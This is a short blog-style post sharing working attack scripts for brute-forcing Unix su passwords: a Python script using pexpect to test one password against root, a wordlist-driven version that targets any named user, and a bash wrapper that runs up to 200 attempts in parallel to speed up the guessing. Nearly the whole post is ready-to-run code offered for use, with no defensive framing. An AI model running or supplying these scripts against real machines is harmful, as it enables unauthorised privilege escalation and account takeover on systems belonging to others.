Here is a simple python script (subruter-single.py) for su brute force that i made a few years ago. This script is using pexpect library which can be downloaded from here.
Select All Code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 | #!/usr/bin/env python # includes import pexpect import sys, getpass, os # variables COMMAND_PROMPT = '[$#] ' WRONGPASS1 = 'Sorry.' WRONGPASS2 = 'su: incorrect password' # main if len(sys.argv) <= 1: print 'Usage: ' print ' ./subruter password' sys.exit (1) PASSWORD = sys.argv[1] child = pexpect.spawn('/bin/su root') child.expect('Password:') child.sendline(PASSWORD) i = child.expect([WRONGPASS1, WRONGPASS2, COMMAND_PROMPT]) if i == 0: print 'WRONG PASSWORD: ',PASSWORD sys.exit (1) if i == 1: print 'WRONG PASSWORD: ',PASSWORD sys.exit (1) if i == 2: print 'PASSWORD FOUND: ',PASSWORD |
With wordlist support (subruter-wordlist.py):
Select All Code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 | #!/usr/bin/env python # includes import pexpect import sys, getpass, os # variables COMMAND_PROMPT = '[$#] ' WRONGPASS1 = 'Sorry.' WRONGPASS2 = 'su: incorrect password' USERNOTEXIST = 'su: user .*' # main if len(sys.argv) <= 2: print 'Usage: ' print ' ./subruter username wordlist' sys.exit (1) USERNAME = sys.argv[1] WORDLIST = sys.argv[2] RUNSU = '/bin/su ' + USERNAME LINES = len(open(WORDLIST, 'rU').readlines( )) print 'Reading', WORDLIST, '...' print 'Found:', LINES, 'passwords.' file = open(WORDLIST, "r") while 1: line = file.readline() if not line: break PASSWORD = line.rstrip('\n') child = pexpect.spawn(RUNSU) a = child.expect([USERNOTEXIST, 'Password:']) if a == 0: print 'USER', USERNAME, 'DOES NOT EXIST!!!' sys.exit (1) if a == 1: print 'Trying password' , PASSWORD child.sendline(PASSWORD) i = child.expect([WRONGPASS1, WRONGPASS2, COMMAND_PROMPT]) if i == 0: print 'WRONG PASSWORD!!!' if i == 1: print 'WRONG PASSWORD!!!' if i == 2: print 'PASSWORD FOUND: ',PASSWORD sys.exit (1) |
In case you want to increase the speed you can use the following shell script (multi.sh):
Select All Code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 | #!/bin/bash echo "MultiThread bruter" if [ "$#" -lt 1 ] then echo "Usage: /multi.sh wordlist-file" exit fi MAX="200" LINES=`cat $1 | wc -l` NUM="0" echo "Found:" $LINES "passwords" for PASSWORD in `cat $1` do SURUNNING=`ps aux | grep "bin/su" | wc -l` ./subruter-single.py $PASSWORD >> su.log& NUM="$[NUM + 1]" if [ $SURUNNING -gt $MAX ]; then sleep 5 fi done |
Feedback is always welcome!
<source>